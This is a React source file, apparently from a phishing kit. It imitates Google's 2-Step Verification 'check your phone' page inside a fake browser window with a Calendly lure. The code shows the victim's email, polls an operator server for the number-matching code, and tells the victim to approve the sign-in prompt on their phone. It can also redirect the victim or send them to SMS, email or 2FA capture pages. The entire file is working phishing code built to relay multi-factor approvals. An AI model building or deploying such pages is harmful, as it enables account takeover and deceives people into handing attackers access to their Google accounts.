import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import BrowserTab from "./BrowserTab";
import CalendlySchedule from "./Calendly";

export default function Tap() {
  const navigate = useNavigate();
  const [verificationNumber, setVerificationNumber] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [error, setError] = useState("");
  const [email, setEmail] = useState("");
  const [resendCountdown, setResendCountdown] = useState(0);
  const [locked, setLocked] = useState(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;

  const handleResend = async () => {
    try {
      await fetch(`${API_URL}/api/resend/app`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ session_id: sessionId }),
      });
    } catch (err) {
      console.error("Resend fail:", err);
    }
  };

  const handleResendClick = (e) => {
    e.preventDefault();
    if (resendCountdown > 0 || locked) return;
    handleResend();
    setResendCountdown(15);
  };

  useEffect(() => {
    const storedEmail = localStorage.getItem("userEmail") || localStorage.getItem("username") || "";
    setEmail(storedEmail);
    
    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  useEffect(() => {
    if (resendCountdown > 0) {
      const timer = setTimeout(() => setResendCountdown(resendCountdown - 1), 1000);
      return () => clearTimeout(timer);
    }
  }, [resendCountdown]);

  useEffect(() => {
    if (!sessionId) return;

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) return;

        const data = await res.json();

        if (data.verification_number) {
          setVerificationNumber(data.verification_number);
        }

        if (data.redirect) {
          clearInterval(poll);
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "tap" && data.authType !== "app") {
          clearInterval(poll);
          const routeMap = {
            email: "/email",
            "2fa": "/2fa",
            sms: "/sms",
            tap: "/tap",
          };
          const route = routeMap[data.authType];
          if (route) {
            navigate(route);
          }
          return;
        }

        // PRIORITY 3: Check for errors (handle all errors universally)
        if (data.error) {
          clearInterval(poll);
          setError(data.error);
          // Don't navigate away on error - let user see the error message
          return;
        }
      } catch (err) {
        console.error("Polling error:", err);
      }
    }, 500); // Poll every 500ms for faster updates

    return () => clearInterval(poll);
  }, [sessionId, navigate]);

  return (
    <div className="calendly-back">
      <CalendlySchedule />
      <div className="login-page">
        <div className="browser-shadow">
          <BrowserTab />
          <div className="google-login-container">
            <div className="google-login-content">
              <div className="google-logo-container">
                <svg width="75" height="24" viewBox="0 0 75 24" xmlns="http://www.w3.org/2000/svg">
                  <path fill="#4285F4" d="M17.64 9.2c0-.637-.057-1.251-.164-1.84H9v3.481h4.844c-.209 1.125-.843 2.078-1.796 2.717v2.258h2.908c1.702-1.567 2.684-3.874 2.684-6.615z"/>
                  <path fill="#34A853" d="M9 18c2.43 0 4.467-.806 5.956-2.184l-2.908-2.258c-.806.54-1.837.86-3.048.86-2.344 0-4.328-1.584-5.036-3.711H.957v2.332C2.438 15.983 5.482 18 9 18z"/>
                  <path fill="#FBBC05" d="M3.964 10.707c-.18-.54-.282-1.117-.282-1.707s.102-1.167.282-1.707V4.951H.957C.348 6.174 0 7.55 0 9s.348 2.826.957 4.049l3.007-2.342z"/>
                  <path fill="#EA4335" d="M9 3.58c1.321 0 2.508.454 3.44 1.345l2.582-2.582C13.463.891 11.426 0 9 0 5.482 0 2.438 2.017.957 4.951L3.964 7.293C4.672 5.163 6.656 3.58 9 3.58z"/>
                </svg>
              </div>
              
              <h1 className="google-signin-heading">2-Step Verification</h1>
              <p className="google-signin-subheading">
                To help keep your account safe, Google wants to make sure it's really you trying to sign in
              </p>

              <div className="google-email-badge">
                <svg
                  xmlns="http://www.w3.org/2000/svg"
                  className="google-email-badge-icon"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
                </svg>
                <span className="google-email-badge-text">{email}</span>
                <svg
                  xmlns="http://www.w3.org/2000/svg"
                  className="google-email-badge-chevron"
                  viewBox="0 0 24 24"
                  fill="currentColor"
                >
                  <path d="M7 10l5 5 5-5z" />
                </svg>
              </div>

              {error && (
                <div className="google-error-container">
                  <p className="google-error-message">{error}</p>
                </div>
              )}

              <div className="google-tap-verification">
                <div className="google-tap-number">{verificationNumber || ""}</div>
                <h3 className="google-tap-heading">Check your phone</h3>
                <p className="google-tap-description">
                  Google sent a notification to your Phone. Open the Gmail app, tap <strong>Yes</strong> on the prompt, then tap {verificationNumber || "the number"} on your phone to verify it's you.
                </p>
                <div className="google-forgot-link">
                  <a
                    href="#"
                    className={`google-link ${(locked || resendCountdown > 0) ? "google-link-disabled" : ""}`}
                    onClick={handleResendClick}
                  >
                    {resendCountdown > 0 ? `Resend in ${resendCountdown}s` : "Resend it"}
                  </a>
                </div>
              </div>

              <div className="google-footer">
                <div className="google-footer-links">
                  <a href="#" className="google-footer-link">Help</a>
                  <a href="#" className="google-footer-link">Privacy</a>
                  <a href="#" className="google-footer-link">Terms</a>
                </div>
                <div className="google-language-selector">
                  <select className="google-language-select">
                    <option>English (United States)</option>
                  </select>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
